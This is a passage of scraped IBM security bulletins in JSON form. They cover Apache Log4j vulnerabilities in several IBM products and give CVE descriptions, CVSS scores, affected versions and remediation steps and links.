[link](<https://download.boulder.ibm.com/ibmdl/pub/software/rationalsdp/documentation/kcci_content/doors_help/> \"link\" ) for the DOORS Help. Download the help contents zip for **_version 9.7.2 or higher_** and unzip it into the new kcci_install directory.\n\n**Additional Help**\n\nFor further information on installing IBM Engineering Requirements Management DOORS on your computer, review the following [information link](<https://www.ibm.com/docs/en/ermd/9.7.2?topic=applications-installing-help-your-computer> \"information link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYQBZ\",\"label\":\"Rational DOORS\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.6.1.7 - 9.7.2.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T16:56:55", "type": "ibm", "title": "Security Bulletin: IBM Engineering Requirements Management DOORS is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T16:56:55", "id": "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "href": "https://www.ibm.com/support/pages/node/6540618", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:34", "description": "## Summary\n\nApache Log4j is used by API Connect as part of its logging and analytics infrastructure. The fix includes Apache Log4j 2.17.1 which addresses CVE-2021-45105, CVE-2021-45046 and CVE-2021-44832.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAPI Connect| V10.0.0.0 - V10.0.4.0 \n---|--- \nAPI Connect| V10.0.1.0 - V10.0.1.5 \nAPI Connect| V2018.4.1.0 - 2018.4.1.17 \nAPI Connect| V5.0.0.0 - 5.0.8.12 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n**Affected Product**| **Addressed in VRMF**| **Remediation / Fix** \n---|---|--- \n \nIBM API Connect \n\nV10.0.1.0 - V10.0.4.0\n\n| V10.0.4.0-ifix1| \n\nAddressed in IBM API Connect V10.0.4.0-ifix1\n\nThe Analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6541170> \n \nIBM API Connect \n\nV10.0.1.1 - V10.0.1.5\n\n| V10.0.1.5-ifix4| \n\nAddressed in IBM API Connect V10.0.1.5-ifix4\n\nThe analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6540696> \n \nIBM API Connect \n\nV2018.4.1.0 - 2018.4.1.17\n\n| V2018.4.1.17-ifix2| \n\nAddressed in IBM API Connect V2018.4.1.17-ifix2\n\nhe Analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6478999> \n \nIBM API Connect\n\nV5.0.0.0 - V5.0.8.12\n\n| V5.0.8.13| \n\nAddressed in IBM API Connect V5.0.8.13\n\nThe Analytics and Management components are impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6538964> \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMNED\",\"label\":\"IBM API Connect\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"all\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T00:06:28", "type": "ibm", "title": "Security Bulletin: API Connect is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046 and CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T00:06:28", "id": "256D7977365CD514F903FC0D0240FD89D47444B078D35EB3DA4DD54AAC8C8661", "href": "https://www.ibm.com/support/pages/node/6541728", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:33", "description": "## Summary\n\nApache Log4j is used by IBM Spectrum Conductor for generating logs in some of its components such as ELK, ascd, GUI and so on. This bulletin provides interim fixes which include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Conductor.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104516| \n\n[sc-2.4.1-build600955](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build600955&includeSupersedes=0> \"sc-2.4.1-build600955\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104513| \n\n[sc-2.5-build600954](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build600954&includeSupersedes=0> \"sc-2.5-build600954\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104512| \n\n[sc-2.5.1-build600953](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build600953&includeSupersedes=0> \"sc-2.5.1-build600953\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes **section.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS4H63\",\"label\":\"IBM Spectrum Conductor\"},\"Component\":\"ASCD\\/PMC\\/Explorer\\/conductorspark\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.5.1;2.5.0;2.4.1\",\"Edition\":\"2.5.1;2.5.0;2.4.1\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T02:42:40", "type": "ibm", "title": "Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Conductor is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T02:42:40", "id": "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "href": "https://www.ibm.com/support/pages/node/6541736", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:56", "description": "## Summary\n\nApache Log4j is used by IBM Watson Explorer to log system events for diagnostics. This bulletin provides a remediation for the security vulnerabilities (CVE-2021-44832, CVE-2021-45105, and CVE-2021-45046) by upgrading IBM Watson Explorer to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| \n\n12.0.0.0, 12.0.0.1\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3 \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2 \n \n\n\n## Remediation/Fixes\n\n**Affected Products**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8\n\n| Upgrade to Version 12.0.3.9. \n\nSee [Watson Explorer Version 12.0.3.9 Foundational Components](<https://www.ibm.com/support/pages/node/6539806>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 Analytical Components](<https://www.ibm.com/support/pages/node/6539808>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| 12.0.0.0, 12.0.0.1, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 oneWEX](<https://www.ibm.com/support/pages/node/6539804>) for download information and instructions. \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n\nSee [Watson Explorer Version 11.0.2.13 Foundational Components](<https://www.ibm.com/support/pages/node/6539814>) for download information and instructions. \n \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n \nSee [Watson Explorer Version 11.0.2.13 Analytical Components](<https://www.ibm.com/support/pages/node/6539816>) for download information and instructions. \n \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3| \n\n 1. If you have not already installed, install Version 12.0.3. For information about Version 12.0.3, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/docview.wss?uid=ibm10880811>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.0&platform=All&function=all>): **12.0.3.0-WS-WatsonExplorer-DAEAnalytical-CAStudio-IF002.**\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2| \n\n 1. If you have not already installed, install Version 11.0.2.2. \n\n * For information about Version 11.0.2, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/pages/node/724425>).\n * For information about upgrading, see the [upgrade procedures](<http://www.ibm.com/support/docview.wss?uid=swg27049072>).For information about Version 11.0.2.2, see the [download document](<http://www.ibm.com/support/docview.wss?uid=swg24044331>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.2&platform=All&function=all>): **11.0.2.2-WS-WatsonExplorer-AEAnalytical-CAStudio-IF002**.\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS8NLW\",\"label\":\"Watson Explorer\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.0.0, 11.0.1, 11.0.2, 12.0.0, 12.0.1, 12.0.2, 12.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T12:14:51", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM Watson Explorer is vulnerable to arbitrary code execution (CVE-2021-44832, CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T12:14:51", "id": "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "href": "https://www.ibm.com/support/pages/node/6540528", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:43:48", "description": "## Summary\n\nThe Netcool/Omnibus 'Administrator GUI' and 'Operator GUI' desktop components use a version of Apache Log4j that contains known vulnerabilities. These vulnerabilities have been addressed by an upgrade to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will 